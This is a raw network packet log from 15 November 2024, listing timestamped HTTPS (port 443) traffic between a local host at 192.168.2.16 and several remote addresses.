                                                                                                            Nov 15, 2024 11:24:42.419862032 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:42.419888020 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:42.490067959 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.490130901 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.490184069 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:42.490248919 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.490287066 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:42.490309954 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:42.565979958 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.566045046 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.566107988 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:42.566139936 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.566159964 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:42.566195011 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:42.612359047 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.612392902 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.612441063 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:42.612467051 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.612483978 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:42.612507105 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:42.683022022 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.683058977 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.683124065 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:42.683141947 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.683162928 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:42.683180094 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:42.729927063 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.729954958 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.730003119 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:42.730019093 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.730037928 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:42.730058908 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:42.735094070 CET44349790142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.735172987 CET49790443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:42.736200094 CET44349790142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.736248016 CET49790443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:42.739273071 CET49790443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:42.739283085 CET44349790142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.739650011 CET44349790142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.739696026 CET49790443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:42.740283012 CET49790443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:42.740350962 CET44349789142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.740412951 CET49789443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:42.745300055 CET49789443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:42.745304108 CET44349789142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.745706081 CET44349789142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.745757103 CET49789443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:42.746243954 CET49789443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:42.751993895 CET44349792142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.752067089 CET49792443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:42.753079891 CET44349792142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.753130913 CET49792443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:42.755713940 CET49792443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:42.755722046 CET44349792142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.756047964 CET44349792142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.756095886 CET49792443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:42.756544113 CET49792443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:42.771219015 CET44349791142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.771289110 CET49791443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:42.773902893 CET49791443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:42.773909092 CET44349791142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.774229050 CET44349791142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.774275064 CET49791443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:42.774774075 CET49791443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:42.787322998 CET44349790142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.787332058 CET44349789142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.799323082 CET44349792142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.801167965 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.801192999 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.801259041 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:42.801312923 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.801347017 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:42.801372051 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:42.815336943 CET44349791142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.847721100 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.847754002 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.847819090 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:42.847841024 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.847871065 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:42.847919941 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:42.918521881 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.918551922 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.918598890 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:42.918617964 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.918643951 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:42.918719053 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:42.965029955 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.965054989 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.965116024 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:42.965143919 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.965163946 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:42.965192080 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.035471916 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.035502911 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.035562992 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.035586119 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.035617113 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.035649061 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.081264019 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.081291914 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.081367970 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.081382990 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.081414938 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.081434011 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.100840092 CET44349790142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.100925922 CET49790443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:43.100958109 CET44349790142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.100999117 CET49790443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:43.101102114 CET49790443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:43.101197004 CET44349790142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.101250887 CET49790443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:43.101804018 CET49793443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:43.101859093 CET44349793142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.101933956 CET49793443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:43.102200985 CET49793443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:43.102219105 CET44349793142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.121675968 CET44349792142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.121732950 CET49792443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:43.121747017 CET44349792142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.121783018 CET49792443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:43.121876955 CET49792443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:43.121910095 CET44349792142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.121957064 CET49792443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:43.122519970 CET49794443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:43.122545958 CET44349794142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.122601986 CET49794443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:43.122889996 CET49794443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:43.122898102 CET44349794142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.151864052 CET44349789142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.151930094 CET44349789142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.151932955 CET49789443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:43.151971102 CET44349789142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.151998997 CET49789443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:43.152020931 CET49789443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:43.152034998 CET44349789142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.152079105 CET49789443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:43.152163982 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.152196884 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.152239084 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.152271986 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.152292967 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.152314901 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.152872086 CET49789443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:43.153044939 CET44349789142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.153101921 CET49789443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:43.153469086 CET49795443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:43.153496981 CET44349795142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.153561115 CET49795443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:43.153851032 CET49795443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:43.153866053 CET44349795142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.193435907 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.193501949 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.193547964 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.193593025 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.193625927 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.193665028 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.201625109 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.201673985 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.201714039 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.201733112 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.201761961 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.201801062 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.271903992 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.271933079 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.271981955 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.271991968 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.272018909 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.272041082 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.296911001 CET44349791142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.296986103 CET49791443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:43.297005892 CET44349791142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.297043085 CET49791443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:43.297135115 CET44349791142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.297178030 CET49791443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:43.297183037 CET44349791142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.297216892 CET49791443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:43.298079014 CET49791443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:43.298125029 CET44349791142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.298176050 CET49791443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:43.298825979 CET49796443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:43.298878908 CET44349796142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.298938036 CET49796443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:43.299773932 CET49796443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:43.299786091 CET44349796142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.316920996 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.316945076 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.316998005 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.317012072 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.317044020 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.317061901 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.387598991 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.387631893 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.387693882 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.387716055 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.387753963 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.387775898 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.428535938 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.428607941 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.428662062 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.428726912 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.428765059 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.428786039 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.478239059 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.478269100 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.478322029 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.478333950 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.478368044 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.478388071 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.507644892 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.507668972 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.507723093 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.507735968 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.507774115 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.507796049 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.551867008 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.551928997 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.551983118 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.552048922 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.552088976 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.552114010 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.621673107 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.621741056 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.621777058 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.621804953 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.621829033 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.621855974 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.662333965 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.662374020 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.662417889 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.662446976 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.662467957 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.662492990 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.669049978 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.669094086 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.669133902 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.669167995 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.669187069 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.669213057 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.740036964 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.740102053 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.740128994 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.740164995 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.740186930 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.740186930 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.740216017 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.779686928 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.779733896 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.779766083 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.779798985 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.779819012 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.779846907 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.787930965 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.787974119 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.788002968 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.788027048 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.788043976 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.788070917 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.857211113 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.857273102 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.857319117 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.857348919 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.857369900 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.857391119 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.896863937 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.896895885 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.896960974 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.896995068 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.897013903 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.897043943 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.905055046 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.905101061 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.905143023 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.905169010 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.905188084 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.905215979 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.974400997 CET44349793142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.974567890 CET49793443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:43.974750042 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.974809885 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.974847078 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.974879980 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.974899054 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.974921942 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:43.977112055 CET44349793142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.977288008 CET49793443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:43.981690884 CET49793443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:43.981745005 CET44349793142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.982181072 CET44349793142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:43.982347965 CET49793443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:43.982697964 CET49793443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:44.000783920 CET44349795142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:44.000885963 CET49795443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:44.002635002 CET44349794142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:44.002701998 CET49794443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:44.002938032 CET49795443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:44.002943993 CET44349795142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:44.003452063 CET44349795142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:44.003509998 CET49795443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:44.003717899 CET44349794142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:44.003774881 CET49794443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:44.003915071 CET49795443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:44.005634069 CET49794443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:44.005640030 CET44349794142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:44.005983114 CET44349794142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:44.006036997 CET49794443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:44.006372929 CET49794443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:44.014062881 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:44.014108896 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:44.014139891 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:44.014173031 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:44.014192104 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:44.014218092 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:44.020886898 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:44.020930052 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:44.020988941 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:44.021035910 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:44.021358013 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:44.027415037 CET44349793142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:44.051340103 CET44349794142.250.185.78192.168.2.16
